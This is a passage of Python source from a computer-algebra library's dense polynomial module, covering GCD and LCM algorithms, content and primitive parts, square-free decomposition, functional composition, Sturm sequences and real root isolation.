gc, G = dmp_primitive(g, u, K)
h = dmp_subresultants(F, G, u, K)[-1]
c, _, _ = dmp_rr_prs_gcd(fc, gc, u-1, K)
if K.is_negative(dmp_ground_LC(h, u, K)):
h = dmp_neg(h, u, K)
_, h = dmp_primitive(h, u, K)
h = dmp_mul_term(h, c, 0, u, K)
cff = dmp_exquo(f, h, u, K)
cfg = dmp_exquo(g, h, u, K)
return h, cff, cfg
@cythonized("u")
def dmp_ff_prs_gcd(f, g, u, K):
"""Computes polynomial GCD using subresultants over a field. """
if not u:
return dup_ff_prs_gcd(f, g, K)
result = _dmp_ff_trivial_gcd(f, g, u, K)
if result is not None:
return result
fc, f = dmp_primitive(f, u, K)
gc, g = dmp_primitive(g, u, K)
h = dmp_subresultants(f, g, u, K)[-1]
c, _, _ = dmp_ff_prs_gcd(fc, gc, u-1, K)
_, h = dmp_primitive(h, u, K)
h = dmp_mul_term(h, c, 0, u, K)
h = dmp_ground_monic(h, u, K)
cff = dmp_exquo(f, h, u, K)
cfg = dmp_exquo(g, h, u, K)
return h, cff, cfg
HEU_GCD_MAX = 6
def _dup_zz_gcd_interpolate(h, x, K):
"""Interpolate polynomial GCD from integer GCD. """
f = []
while h:
g = h % x
if g > x // 2:
g -= x
f.insert(0, g)
h = (h-g) // x
return f
@cythonized("i,df,dg")
def dup_zz_heu_gcd(f, g, K):
"""Heuristic polynomial GCD in `Z[x]`.
Given univariate polynomials `f` and `g` in `Z[x]`, returns their GCD
and cofactors, i.e. polynomials `h`, `cff` and `cfg` such that::
h = gcd(f, g), cff = quo(f, h) and cfg = quo(g, h)
The algorithm is purely heuristic which means it may fail to compute
the GCD. This will be signaled by raising an exception. In this case
you will need to switch to another GCD method.
The algorithm computes the polynomial GCD by evaluating polynomials
f and g at certain points and computing (fast) integer GCD of those
evaluations. The polynomial GCD is recovered from the integer image
by interpolation. The final step is to verify if the result is the
correct GCD. This gives cofactors as a side effect.
References
==========
.. [Liao95] <NAME>, <NAME>, Evaluation of the heuristic
polynomial GCD, International Symposium on Symbolic and Algebraic
Computation (ISSAC), ACM Press, Montreal, Quebec, Canada, 1995,
pp. 240--247
"""
result = _dup_rr_trivial_gcd(f, g, K)
if result is not None:
return result
df = dup_degree(f)
dg = dup_degree(g)
gcd, f, g = dup_extract(f, g, K)
if df == 0 or dg == 0:
return [gcd], f, g
f_norm = dup_max_norm(f, K)
g_norm = dup_max_norm(g, K)
B = 2*min(f_norm, g_norm) + 29
x = max(min(B, 99*K.sqrt(B)),
2*min(f_norm // abs(dup_LC(f, K)),
g_norm // abs(dup_LC(g, K))) + 2)
for i in xrange(0, HEU_GCD_MAX):
ff = dup_eval(f, x, K)
gg = dup_eval(g, x, K)
if ff and gg:
h = K.gcd(ff, gg)
cff = ff // h
cfg = gg // h
h = _dup_zz_gcd_interpolate(h, x, K)
h = dup_primitive(h, K)[1]
cff_, r = dup_div(f, h, K)
if not r:
cfg_, r = dup_div(g, h, K)
if not r:
h = dup_mul_ground(h, gcd, K)
return h, cff_, cfg_
cff = _dup_zz_gcd_interpolate(cff, x, K)
h, r = dup_div(f, cff, K)
if not r:
cfg_, r = dup_div(g, h, K)
if not r:
h = dup_mul_ground(h, gcd, K)
return h, cff, cfg_
cfg = _dup_zz_gcd_interpolate(cfg, x, K)
h, r = dup_div(g, cfg, K)
if not r:
cff_, r = dup_div(f, h, K)
if not r:
h = dup_mul_ground(h, gcd, K)
return h, cff, cfg
x = 73794*x * K.sqrt(K.sqrt(x)) // 27011
raise HeuristicGCDFailed('no luck')
@cythonized("v")
def _dmp_zz_gcd_interpolate(h, x, v, K):
"""Interpolate polynomial GCD from integer GCD. """
f = []
while not dmp_zero_p(h, v):
g = dmp_ground_trunc(h, x, v, K)
f.insert(0, g)
h = dmp_sub(h, g, v, K)
h = dmp_exquo_ground(h, x, v, K)
if K.is_negative(dmp_ground_LC(f, v+1, K)):
return dmp_neg(f, v+1, K)
else:
return f
@cythonized("u,v,i,dg,df")
def dmp_zz_heu_gcd(f, g, u, K):
"""Heuristic polynomial GCD in `Z[X]`.
Given univariate polynomials `f` and `g` in `Z[X]`, returns their GCD
and cofactors, i.e. polynomials `h`, `cff` and `cfg` such that::
h = gcd(f, g), cff = quo(f, h) and cfg = quo(g, h)
The algorithm is purely heuristic which means it may fail to compute
the GCD. This will be signaled by raising an exception. In this case
you will need to switch to another GCD method.
The algorithm computes the polynomial GCD by evaluating polynomials
f and g at certain points and computing (fast) integer GCD of those
evaluations. The polynomial GCD is recovered from the integer image
by interpolation. The evaluation proces reduces f and g variable by
variable into a large integer. The final step is to verify if the
interpolated polynomial is the correct GCD. This gives cofactors of
the input polynomials as a side effect.
References
==========
.. [Liao95] <NAME>, <NAME>, Evaluation of the heuristic
polynomial GCD, International Symposium on Symbolic and Algebraic
Computation (ISSAC), ACM Press, Montreal, Quebec, Canada, 1995,
pp. 240--247
"""
if not u:
return dup_zz_heu_gcd(f, g, K)
result = _dmp_rr_trivial_gcd(f, g, u, K)
if result is not None:
return result
df = dmp_degree(f, u)
dg = dmp_degree(g, u)
gcd, f, g = dmp_ground_extract(f, g, u, K)
f_norm = dmp_max_norm(f, u, K)
g_norm = dmp_max_norm(g, u, K)
B = 2*min(f_norm, g_norm) + 29
x = max(min(B, 99*K.sqrt(B)),
2*min(f_norm // abs(dmp_ground_LC(f, u, K)),
g_norm // abs(dmp_ground_LC(g, u, K))) + 2)
for i in xrange(0, HEU_GCD_MAX):
ff = dmp_eval(f, x, u, K)
gg = dmp_eval(g, x, u, K)
v = u - 1
if not (dmp_zero_p(ff, v) or dmp_zero_p(gg, v)):
h, cff, cfg = dmp_zz_heu_gcd(ff, gg, v, K)
h = _dmp_zz_gcd_interpolate(h, x, v, K)
h = dmp_ground_primitive(h, u, K)[1]
cff_, r = dmp_div(f, h, u, K)
if dmp_zero_p(r, u):
cfg_, r = dmp_div(g, h, u, K)
if dmp_zero_p(r, u):
h = dmp_mul_ground(h, gcd, u, K)
return h, cff_, cfg_
cff = _dmp_zz_gcd_interpolate(cff, x, v, K)
h, r = dmp_div(f, cff, u, K)
if dmp_zero_p(r, u):
cfg_, r = dmp_div(g, h, u, K)
if dmp_zero_p(r, u):
h = dmp_mul_ground(h, gcd, u, K)
return h, cff, cfg_
cfg = _dmp_zz_gcd_interpolate(cfg, x, v, K)
h, r = dmp_div(g, cfg, u, K)
if dmp_zero_p(r, u):
cff_, r = dmp_div(f, h, u, K)
if dmp_zero_p(r, u):
h = dmp_mul_ground(h, gcd, u, K)
return h, cff_, cfg
x = 73794*x * K.sqrt(K.sqrt(x)) // 27011
raise HeuristicGCDFailed('no luck')
def dup_qq_heu_gcd(f, g, K0):
"""Heuristic polynomial GCD in `Q[x]`. """
result = _dup_ff_trivial_gcd(f, g, K0)
if result is not None:
return result
K1 = K0.get_ring()
cf, f = dup_ground_to_ring(f, K0, K1)
cg, g = dup_ground_to_ring(g, K0, K1)
f = dup_convert(f, K0, K1)
g = dup_convert(g, K0, K1)
h, cff, cfg = dup_zz_heu_gcd(f, g, K1)
h = dup_convert(h, K1, K0)
c = dup_LC(h, K0)
h = dup_monic(h, K0)
cff = dup_convert(cff, K1, K0)
cfg = dup_convert(cfg, K1, K0)
cff = dup_mul_ground(cff, K0.quo(c, cf), K0)
cfg = dup_mul_ground(cfg, K0.quo(c, cg), K0)
return h, cff, cfg
@cythonized("u")
def dmp_qq_heu_gcd(f, g, u, K0):
"""Heuristic polynomial GCD in `Q[X]`. """
result = _dmp_ff_trivial_gcd(f, g, u, K0)
if result is not None:
return result
K1 = K0.get_ring()
cf, f = dmp_ground_to_ring(f, u, K0, K1)
cg, g = dmp_ground_to_ring(g, u, K0, K1)
f = dmp_convert(f, u, K0, K1)
g = dmp_convert(g, u, K0, K1)
h, cff, cfg = dmp_zz_heu_gcd(f, g, u, K1)
h = dmp_convert(h, u, K1, K0)
c = dmp_ground_LC(h, u, K0)
h = dmp_ground_monic(h, u, K0)
cff = dmp_convert(cff, u, K1, K0)
cfg = dmp_convert(cfg, u, K1, K0)
cff = dmp_mul_ground(cff, K0.quo(c, cf), u, K0)
cfg = dmp_mul_ground(cfg, K0.quo(c, cg), u, K0)
return h, cff, cfg
USE_DUP_HEU_GCD = 1
USE_DMP_HEU_GCD = 1
def dup_inner_gcd(f, g, K):
"""Computes polynomial GCD and cofactors of `f` and `g` in `K[x]`. """
if K.has_Field or not K.is_Exact:
if USE_DUP_HEU_GCD:
if K.is_QQ:
try:
return dup_qq_heu_gcd(f, g, K)
except HeuristicGCDFailed:
pass
return dup_ff_prs_gcd(f, g, K)
else:
if USE_DUP_HEU_GCD:
if K.is_ZZ:
try:
return dup_zz_heu_gcd(f, g, K)
except HeuristicGCDFailed:
pass
return dup_rr_prs_gcd(f, g, K)
@cythonized("u")
def _dmp_inner_gcd(f, g, u, K):
"""Helper function for `dmp_inner_gcd()`. """
if K.has_Field or not K.is_Exact:
if USE_DMP_HEU_GCD:
if K.is_QQ:
try:
return dmp_qq_heu_gcd(f, g, u, K)
except HeuristicGCDFailed:
pass
return dmp_ff_prs_gcd(f, g, u, K)
else:
if USE_DMP_HEU_GCD:
if K.is_ZZ:
try:
return dmp_zz_heu_gcd(f, g, u, K)
except HeuristicGCDFailed:
pass
return dmp_rr_prs_gcd(f, g, u, K)
@cythonized("u")
def dmp_inner_gcd(f, g, u, K):
"""Computes polynomial GCD and cofactors of `f` and `g` in `K[X]`. """
if not u:
return dup_inner_gcd(f, g, K)
J, (f, g) = dmp_multi_deflate((f, g), u, K)
h, cff, cfg = _dmp_inner_gcd(f, g, u, K)
return (dmp_inflate(h, J, u, K),
dmp_inflate(cff, J, u, K),
dmp_inflate(cfg, J, u, K))
def dup_gcd(f, g, K):
"""Computes polynomial GCD of `f` and `g` in `K[x]`. """
return dup_inner_gcd(f, g, K)[0]
@cythonized("u")
def dmp_gcd(f, g, u, K):
"""Computes polynomial GCD of `f` and `g` in `K[X]`. """
return dmp_inner_gcd(f, g, u, K)[0]
def dup_rr_lcm(f, g, K):
"""Computes polynomial LCM over a ring in `K[x]`. """
fc, f = dup_primitive(f, K)
gc, g = dup_primitive(g, K)
c = K.lcm(fc, gc)
h = dup_exquo(dup_mul(f, g, K),
dup_gcd(f, g, K), K)
return dup_mul_ground(h, c, K)
def dup_ff_lcm(f, g, K):
"""Computes polynomial LCM over a field in `K[x]`. """
h = dup_exquo(dup_mul(f, g, K),
dup_gcd(f, g, K), K)
return dup_monic(h, K)
def dup_lcm(f, g, K):
"""Computes polynomial LCM of `f` and `g` in `K[x]`. """
if K.has_Field or not K.is_Exact:
return dup_ff_lcm(f, g, K)
else:
return dup_rr_lcm(f, g, K)
@cythonized("u")
def dmp_rr_lcm(f, g, u, K):
"""Computes polynomial LCM over a ring in `K[X]`. """
fc, f = dmp_ground_primitive(f, u, K)
gc, g = dmp_ground_primitive(g, u, K)
c = K.lcm(fc, gc)
h = dmp_exquo(dmp_mul(f, g, u, K),
dmp_gcd(f, g, u, K), u, K)
return dmp_mul_ground(h, c, u, K)
@cythonized("u")
def dmp_ff_lcm(f, g, u, K):
"""Computes polynomial LCM over a field in `K[X]`. """
h = dmp_exquo(dmp_mul(f, g, u, K),
dmp_gcd(f, g, u, K), u, K)
return dmp_ground_monic(h, u, K)
@cythonized("u")
def dmp_lcm(f, g, u, K):
"""Computes polynomial LCM of `f` and `g` in `K[X]`. """
if not u:
return dup_lcm(f, g, K)
if K.has_Field or not K.is_Exact:
return dmp_ff_lcm(f, g, u, K)
else:
return dmp_rr_lcm(f, g, u, K)
def dup_trunc(f, p, K):
"""Reduce `K[x]` polynomial modulo a constant `p` in `K`. """
if K.is_ZZ:
g = []
for c in f:
c = c % p
if c > p // 2:
g.append(c - p)
else:
g.append(c)
else:
g = [ c % p for c in f ]
return dup_strip(g)
@cythonized("u")
def dmp_trunc(f, p, u, K):
"""Reduce `K[X]` polynomial modulo a polynomial `p` in `K[Y]`. """
return dmp_strip([ dmp_rem(c, p, u-1, K) for c in f ], u)
@cythonized("u,v")
def dmp_ground_trunc(f, p, u, K):
"""Reduce `K[X]` polynomial modulo a constant `p` in `K`. """
if not u:
return dup_trunc(f, p, K)
v = u-1
return dmp_strip([ dmp_ground_trunc(c, p, v, K) for c in f ], u)
def dup_monic(f, K):
"""Divides all coefficients by `LC(f)` in `K[x]`. """
if not f:
return f
lc = dup_LC(f, K)
if K.is_one(lc):
return f
else:
return dup_quo_ground(f, lc, K)
@cythonized("u")
def dmp_ground_monic(f, u, K):
"""Divides all coefficients by `LC(f)` in `K[X]`. """
if not u:
return dup_monic(f, K)
if dmp_zero_p(f, u):
return f
lc = dmp_ground_LC(f, u, K)
if K.is_one(lc):
return f
else:
return dmp_quo_ground(f, lc, u, K)
def dup_rr_content(f, K):
"""Returns GCD of coefficients over a ring. """
cont = K.zero
for c in f:
cont = K.gcd(cont, c)
if K.is_one(cont):
break
return cont
def dup_ff_content(f, K):
"""Returns GCD of coefficients over a field. """
if not f:
return K.zero
else:
return K.one
def dup_content(f, K):
"""Returns GCD of coefficients in `K[x]`. """
if K.has_Field or not K.is_Exact:
return dup_ff_content(f, K)
else:
return dup_rr_content(f, K)
@cythonized("u,v")
def dmp_content(f, u, K):
"""Returns GCD of multivariate coefficients. """
cont, v = dmp_LC(f, K), u-1
if dmp_zero_p(f, u):
return cont
for c in f[1:]:
cont = dmp_gcd(cont, c, v, K)
if dmp_one_p(cont, v, K):
break
if K.is_negative(dmp_ground_LC(cont, v, K)):
return dmp_neg(cont, v, K)
else:
return cont
@cythonized("u,v")
def dmp_rr_ground_content(f, u, K):
"""Returns GCD of coefficients over a ring. """
if not u:
return dup_rr_content(f, K)
cont, v = K.zero, u-1
for c in f:
gc = dmp_rr_ground_content(c, v, K)
cont = K.gcd(cont, gc)
if K.is_one(cont):
break
return cont
@cythonized("u")
def dmp_ff_ground_content(f, u, K):
"""Returns GCD of coefficients over a field. """
if not f:
return K.zero
else:
return K.one
@cythonized("u")
def dmp_ground_content(f, u, K):
"""Returns GCD of coefficients in `K[X]`. """
if not u:
return dup_content(f, K)
if K.has_Field or not K.is_Exact:
return dmp_ff_ground_content(f, u, K)
else:
return dmp_rr_ground_content(f, u, K)
def dup_rr_primitive(f, K):
"""Returns content and a primitive polynomial over a ring. """
cont = dup_content(f, K)
if not f or K.is_one(cont):
return cont, f
else:
return cont, dup_exquo_ground(f, cont, K)
def dup_ff_primitive(f, K):
"""Returns content and a primitive polynomial over a field. """
return K.one, f
def dup_primitive(f, K):
"""Returns content and a primitive polynomial in `K[x]`. """
if K.has_Field or not K.is_Exact:
return dup_ff_primitive(f, K)
else:
return dup_rr_primitive(f, K)
@cythonized("u,v")
def dmp_primitive(f, u, K):
"""Returns multivariate content and a primitive polynomial. """
cont, v = dmp_content(f, u, K), u-1
if dmp_zero_p(f, u) or dmp_one_p(cont, v, K):
return cont, f
else:
return cont, [ dmp_exquo(c, cont, v, K) for c in f ]
@cythonized("u")
def dmp_rr_ground_primitive(f, u, K):
"""Returns content and a primitive polynomial over a ring. """
cont = dmp_ground_content(f, u, K)
if K.is_one(cont):
return cont, f
else:
return cont, dmp_exquo_ground(f, cont, u, K)
@cythonized("u")
def dmp_ff_ground_primitive(f, u, K):
"""Returns content and a primitive polynomial over a ring. """
if dmp_zero_p(f, u):
return K.zero, f
else:
return K.one, f
@cythonized("u")
def dmp_ground_primitive(f, u, K):
"""Returns content and a primitive polynomial in `K[x]`. """
if not u:
return dup_primitive(f, K)
if dmp_zero_p(f, u):
return K.zero, f
if K.has_Field or not K.is_Exact:
return dmp_ff_ground_primitive(f, u, K)
else:
return dmp_rr_ground_primitive(f, u, K)
def dup_sqf_p(f, K):
"""Returns `True` if `f` is a square-free polynomial in `K[x]`. """
if not f:
return True
else:
return not dup_degree(dup_gcd(f, dup_diff(f, 1, K), K))
@cythonized("u")
def dmp_sqf_p(f, u, K):
"""Returns `True` if `f` is a square-free polynomial in `K[X]`. """
if dmp_zero_p(f, u):
return True
else:
return not dmp_degree(dmp_gcd(f, dmp_diff(f, 1, u, K), u, K), u)
@cythonized("s")
def dup_sqf_norm(f, K):
"""Square-free norm of `f` in `K[x]`, useful over algebraic domains. """
if not K.is_Algebraic:
raise DomainError("ground domain must be algebraic")
s, g = 0, dmp_raise(K.mod.rep, 1, 0, K.dom)
while True:
h, _ = dmp_inject(f, 0, K, front=True)
r = dmp_resultant(g, h, 1, K.dom)
if dup_sqf_p(r, K.dom):
break
else:
f, s = dup_taylor(f, -K.unit, K), s+1
return s, f, r
@cythonized("s,u")
def dmp_sqf_norm(f, u, K):
"""Square-free norm of `f` in `K[X]`, useful over algebraic domains. """
if not u:
return dup_sqf_norm(f, K)
if not K.is_Algebraic:
raise DomainError("ground domain must be algebraic")
g = dmp_raise(K.mod.rep, u+1, 0, K.dom)
F = dmp_raise([K.one,-K.unit], u, 0, K)
s = 0
while True:
h, _ = dmp_inject(f, u, K, front=True)
r = dmp_resultant(g, h, u+1, K.dom)
if dmp_sqf_p(r, u, K.dom):
break
else:
f, s = dmp_compose(f, F, u, K), s+1
return s, f, r
def dup_sqf_part(f, K):
"""Returns square-free part of a polynomial in `K[x]`. """
if not f:
return f
if K.is_negative(dup_LC(f, K)):
f = dup_neg(f, K)
gcd = dup_gcd(f, dup_diff(f, 1, K), K)
sqf = dup_exquo(f, gcd, K)
if K.has_Field or not K.is_Exact:
return dup_monic(sqf, K)
else:
return dup_primitive(sqf, K)[1]
@cythonized("u")
def dmp_sqf_part(f, u, K):
"""Returns square-free part of a polynomial in `K[X]`. """
if dmp_zero_p(f, u):
return f
if K.is_negative(dmp_ground_LC(f, u, K)):
f = dmp_neg(f, u, K)
gcd = dmp_gcd(f, dmp_diff(f, 1, u, K), u, K)
sqf = dmp_exquo(f, gcd, u, K)
if K.has_Field or not K.is_Exact:
return dmp_ground_monic(sqf, u, K)
else:
return dmp_ground_primitive(sqf, u, K)[1]
@cythonized("i")
def dup_sqf_list(f, K, **args):
"""Returns square-free decomposition of a polynomial in `K[x]`. """
if K.has_Field or not K.is_Exact:
coeff = dup_LC(f, K)
f = dup_monic(f, K)
else:
coeff, f = dup_primitive(f, K)
if K.is_negative(dup_LC(f, K)):
f = dup_neg(f, K)
coeff = -coeff
if dup_degree(f) <= 0:
if args.get('include', False):
return f
else:
return coeff, []
result, i = [], 1
h = dup_diff(f, 1, K)
g, p, q = dup_inner_gcd(f, h, K)
all = args.get('all', False)
while True:
d = dup_diff(p, 1, K)
h = dup_sub(q, d, K)
if not h:
result.append((p, i))
break
g, p, q = dup_inner_gcd(p, h, K)
if all or dup_degree(g) > 0:
result.append((g, i))
i += 1
if not args.get('include', False):
return coeff, result
else:
(g, i), rest = result[0], result[1:]
g = dup_mul_ground(g, coeff, K)
return [(g, i)] + rest
@cythonized("u,i")
def dmp_sqf_list(f, u, K, **args):
"""Returns square-free decomposition of a polynomial in `K[X]`. """
if not u:
return dup_sqf_list(f, K, **args)
if K.has_Field or not K.is_Exact:
coeff = dmp_ground_LC(f, u, K)
f = dmp_ground_monic(f, u, K)
else:
coeff, f = dmp_ground_primitive(f, u, K)
if K.is_negative(dmp_ground_LC(f, u, K)):
f = dmp_neg(f, u, K)
coeff = -coeff
if dmp_degree(f, u) <= 0:
if args.get('include', False):
return f
else:
return coeff, []
result, i = [], 1
h = dmp_diff(f, 1, u, K)
g, p, q = dmp_inner_gcd(f, h, u, K)
all = args.get('all', False)
while True:
d = dmp_diff(p, 1, u, K)
h = dmp_sub(q, d, u, K)
if dmp_zero_p(h, u):
result.append((p, i))
break
g, p, q = dmp_inner_gcd(p, h, u, K)
if all or dmp_degree(g, u) > 0:
result.append((g, i))
i += 1
if not args.get('include', False):
return coeff, result
else:
(g, i), rest = result[0], result[1:]
g = dup_mul_ground(g, coeff, K)
return [(g, i)] + rest
def dup_extract(f, g, K):
"""Extracts common content from a pair of polynomials in `K[x]`. """
fc = dup_content(f, K)
gc = dup_content(g, K)
gcd = K.gcd(fc, gc)
if not K.is_one(gcd):
f = dup_exquo_ground(f, gcd, K)
g = dup_exquo_ground(g, gcd, K)
return gcd, f, g
@cythonized("u")
def dmp_ground_extract(f, g, u, K):
"""Extracts common content from a pair of polynomials in `K[X]`. """
fc = dmp_ground_content(f, u, K)
gc = dmp_ground_content(g, u, K)
gcd = K.gcd(fc, gc)
if not K.is_one(gcd):
f = dmp_exquo_ground(f, gcd, u, K)
g = dmp_exquo_ground(g, gcd, u, K)
return gcd, f, g
def dup_mirror(f, K):
"""Evaluate efficiently composition `f(-x)` in `K[x]`. """
f, n, a = list(f), dup_degree(f), -K.one
for i in xrange(n-1, -1, -1):
f[i], a = a*f[i], -a
return f
def dup_scale(f, a, K):
"""Evaluate efficiently composition `f(a*x)` in `K[x]`. """
f, n, b = list(f), dup_degree(f), a
for i in xrange(n-1, -1, -1):
f[i], b = b*f[i], b*a
return f
def dup_taylor(f, a, K):
"""Evaluate efficiently Taylor shift `f(x + a)` in `K[x]`. """
f, n = list(f), dup_degree(f)
for i in xrange(n, 0, -1):
for j in xrange(0, i):
f[j+1] += a*f[j]
return f
def dup_transform(f, p, q, K):
"""Evaluate functional transformation `q**n * f(p/q)` in `K[x]`. """
if not f:
return []
h, Q = [f[0]], [[K.one]]
for i in xrange(0, dup_degree(f)):
Q.append(dup_mul(Q[-1], q, K))
for c, q in zip(f[1:], Q[1:]):
h = dup_mul(h, p, K)
q = dup_mul_ground(q, c, K)
h = dup_add(h, q, K)
return h
def dup_compose(f, g, K):
"""Evaluate functional composition `f(g)` in `K[x]`. """
if len(g) <= 1:
return dup_strip([dup_eval(f, dup_LC(g, K), K)])
if not f:
return []
h = [f[0]]
for c in f[1:]:
h = dup_mul(h, g, K)
h = dup_add_term(h, c, 0, K)
return h
@cythonized("u")
def dmp_compose(f, g, u, K):
"""Evaluate functional composition `f(g)` in `K[X]`. """
if not u:
return dup_compose(f, g, K)
if dmp_zero_p(f, u):
return f
h = [f[0]]
for c in f[1:]:
h = dmp_mul(h, g, u, K)
h = dmp_add_term(h, c, 0, u, K)
return h
@cythonized("s,n,r,i,j")
def _dup_right_decompose(f, s, K):
"""XXX"""
n = dup_degree(f)
lc = dup_LC(f, K)
f = dup_to_raw_dict(f)
g = { s : K.one }
r = n // s
for i in xrange(1, s):
coeff = K.zero
for j in xrange(0, i):
if not n+j-i in f:
continue
if not s-j in g:
continue
fc, gc = f[n+j-i], g[s-j]
coeff += (i - r*j)*fc*gc
g[s-i] = K.exquo(coeff, i*r*lc)
return dup_from_raw_dict(g, K)
@cythonized("i")
def _dup_left_decompose(f, h, K):
"""XXX"""
g, i = {}, 0
while f:
q, r = dup_div(f, h, K)
if dup_degree(r) > 0:
return None
else:
g[i] = dup_LC(r, K)
f, i = q, i + 1
return dup_from_raw_dict(g, K)
@cythonized("df,s")
def _dup_decompose(f, K):
"""XXX"""
df = dup_degree(f)
for s in xrange(2, df):
if df % s != 0:
continue
h = _dup_right_decompose(f, s, K)
if h is not None:
g = _dup_left_decompose(f, h, K)
if g is not None:
return g, h
return None
def dup_decompose(f, K):
"""Computes functional decomposition of `f` in `K[x]`.
Given an univariate polynomial `f` with coefficients in a field of
characteristic zero, returns tuple `(f_1, f_2, ..., f_n)`, where::
f = f_1 o f_2 o ... f_n = f_1(f_2(... f_n))
and `f_2, ..., f_n` are monic and homogeneous polynomials of at
least second degree.
Unlike factorization, complete functional decompositions of
polynomials are not unique, consider examples:
1. `f o g = f(x + b) o (g - b)`
2. `x**n o x**m = x**m o x**n`
3. `T_n o T_m = T_m o T_n`
where `T_n` and `T_m` are Chebyshev polynomials.
References
==========
.. [Kozen89] <NAME>, <NAME>, Polynomial decomposition algorithms,
Journal of Symbolic Computation 7 (1989), pp. 445-456
"""
F = []
while True:
result = _dup_decompose(f, K)
if result is not None:
f, h = result
F = [h] + F
else:
break
return [f] + F
def dup_sturm(f, K):
"""Computes the Sturm sequence of `f` in `F[x]`.
Given an univariate, square-free polynomial `f(x)` returns the
associated Sturm sequence `f_0(x), ..., f_n(x)` defined by::
f_0(x), f_1(x) = f(x), f'(x)
f_n = -rem(f_{n-2}(x), f_{n-1}(x))
References
==========
.. [Davenport88] <NAME>, <NAME>, <NAME>,
Computer Algebra Systems and Algorithms for Algebraic
Computation, Academic Press, London, 1988, pp. 124-128
"""
if not K.has_Field:
raise DomainError('computation can be done only in a field')
f = dup_sqf_part(f, K)
sturm = [f, dup_diff(f, 1, K)]
while sturm[-1]:
s = dup_rem(sturm[-2], sturm[-1], K)
sturm.append(dup_neg(s, K))
return sturm[:-1]
@cythonized("u")
def dmp_lift(f, u, K):
"""Convert algebraic coefficients to integers in `K[X]`. """
if not K.is_Algebraic:
raise DomainError('computation can be done only in an algebraic domain')
F, monoms, polys = dmp_to_dict(f, u), [], []
for monom, coeff in F.iteritems():
if not coeff.is_ground:
monoms.append(monom)
perms = variations([-1, 1], len(monoms), repetition=True)
for perm in perms:
G = dict(F)
for sign, monom in zip(perm, monoms):
if sign == -1:
G[monom] = -G[monom]
polys.append(dmp_from_dict(G, u, K))
return dmp_convert(dmp_expand(polys, u, K), u, K, K.dom)
def dup_sign_variations(f, K):
"""Compute the number of sign variations of `f` in `K[x]`. """
prev, k = K.zero, 0
for coeff in f:
if coeff*prev < 0:
k += 1
if coeff:
prev = coeff
return k
def dup_root_upper_bound(f, K):
"""Compute LMQ upper bound for `f`'s positive roots. """
n, t, P = len(f), K.one, []
if dup_LC(f, K) < 0:
f = dup_neg(f, K)
f = list(reversed(f))
for i in xrange(0, n):
if f[i] >= 0:
continue
a, Q = K.log(-f[i], 2), []
for j in xrange(i+1, n):
if f[j] <= 0:
continue
q = t + a - K.log(f[j], 2)
Q.append(q // (j - i))
t += 1
if not Q:
continue
P.append(min(Q))
if not P:
return None
else:
return 2.0**(max(P)+1)
def dup_root_lower_bound(f, K):
"""Compute LMQ lower bound for `f`'s positive roots. """
bound = dup_root_upper_bound(dup_reverse(f), K)
if bound is not None:
return 1.0 / bound
else:
return None
def dup_inner_refine_real_root(f, (a, b, c, d), cond, fast, K):
"""Refine a positive root of `f` given a Mobius transform. """
F, i = K.get_field(), 0
while not c or not cond(a, b, c, d, i, F):
A = dup_root_lower_bound(f, K)
if A is not None:
A = K(int(A))
else:
A = K.zero
if fast and A > 16:
f = dup_scale(f, A, K)
a, c, A = A*a, A*c, K.one
if A >= K.one:
f = dup_taylor(f, A, K)
b, d = A*a + b, A*c + d
if not dup_eval(f, K.zero, K):
return F(b, d), F(b, d)
f, g = dup_taylor(f, K.one, K), f
a1, b1, c1, d1 = a, a+b, c, c+d
if not dup_eval(f, K.zero, K):
return F(b1, d1), F(b1, d1)
k = dup_sign_variations(f, K)
if k == 1:
a, b, c, d = a1, b1, c1, d1
else:
f = dup_taylor(dup_reverse(g), K.one, K)
if not dup_eval(f, K.zero, K):
f = dup_rshift(f, 1, K)
a, b, c, d = b, a+b, d, c+d
i += 1
s, t = F(a, c), F(b, d)
if s <= t:
return (s, t)
else:
return (t, s)
def dup_outer_refine_real_root(f, s, t, cond, fast, K):
"""Refine a positive root of `f` given an interval `(s, t)`. """
if s == t:
return (s, t)
F = K.get_field()
a, c = F.numer(s), F.denom(s)
b, d = F.numer(t), F.denom(t)
f = dup_transform(f, dup_strip([a, b]),
dup_strip([c, d]), K)
if dup_sign_variations(f, K) != 1:
raise RefinementFailed("there should be exactly one root on (%s, %s)" % (s, t))
return dup_inner_refine_real_root(f, (a, b, c, d), cond, fast, K)
def dup_refine_real_root(f, s, t, n, K, **args):
"""Refine real root's approximating interval to the given precision. """
if K.is_QQ:
(_, f), K = dup_ground_to_ring(f, K, convert=True), K.get_ring()
elif not K.is_ZZ:
raise DomainError("real root refinement not supported over %s" % K)
if s == t:
return (s, t)
if s > t:
s, t = t, s
negative = False
if s < 0:
if t <= 0:
f, s, t, negative = dup_mirror(f, K), -t, -s, True
else:
raise ValueError("can't refine a real root on (%s, %s)" % (s, t))
fast = args.get('fast')
if type(n) is not int:
cond = lambda a, b, c, d, i, F: abs(F(a, c) - F(b, d)) < n
else:
cond = lambda a, b, c, d, i, F: i >= n
s, t = dup_outer_refine_real_root(f, s, t, cond, fast, K)
if negative:
return (-t, -s)
else:
return ( s, t)
def dup_inner_isolate_real_roots(f, cond, fast, K):
"""Iteratively compute disjoint positive root isolation intervals. """
a, b, c, d = K.one, K.zero, K.zero, K.one
k = dup_sign_variations(f, K)
if k == 0:
return []
if k == 1:
roots = [dup_inner_refine_real_root(
f, (a, b, c, d), cond, fast, K)]
else:
roots, stack = [], [(a, b, c, d, f, k)]
F = K.get_field()
while stack:
a, b, c, d, f, k = stack.pop()
A = dup_root_lower_bound(f, K)
if A is not None:
A = K(int(A))
else:
A = K.zero
if fast and A > 16:
f = dup_scale(f, A, K)
a, c, A = A*a, A*c, K.one
if A >= K.one:
f = dup_taylor(f, A, K)
b, d = A*a + b, A*c + d
if not dup_eval(f, K.zero, K):
roots.append((F(b, d), F(b, d)))
f = dup_rshift(f, 1, K)
k = dup_sign_variations(f, K)
if k == 0:
continue
if k == 1:
roots.append(dup_inner_refine_real_root(
f, (a, b, c, d), cond, fast, K))
continue
f1 = dup_taylor(f, K.one, K)
a1, b1, c1, d1, r = a, a+b, c, c+d, 0
if not dup_eval(f1, K.zero, K):
roots.append((F(b1, d1), F(b1, d1)))
f1, r = dup_rshift(f1, 1, K), 1
k1 = dup_sign_variations(f1, K)
k2 = k - k1 - r
a2, b2, c2, d2 = b, a+b, d, c+d
if k2 > 1 or (k1 > 0 and k2 == 1):
f2 = dup_taylor(dup_reverse(f), K.one, K)
if not dup_eval(f2, K.zero, K):
f2 = dup_rshift(f2, 1, K)
k2 = dup_sign_variations(f2, K)
if k1 < k2:
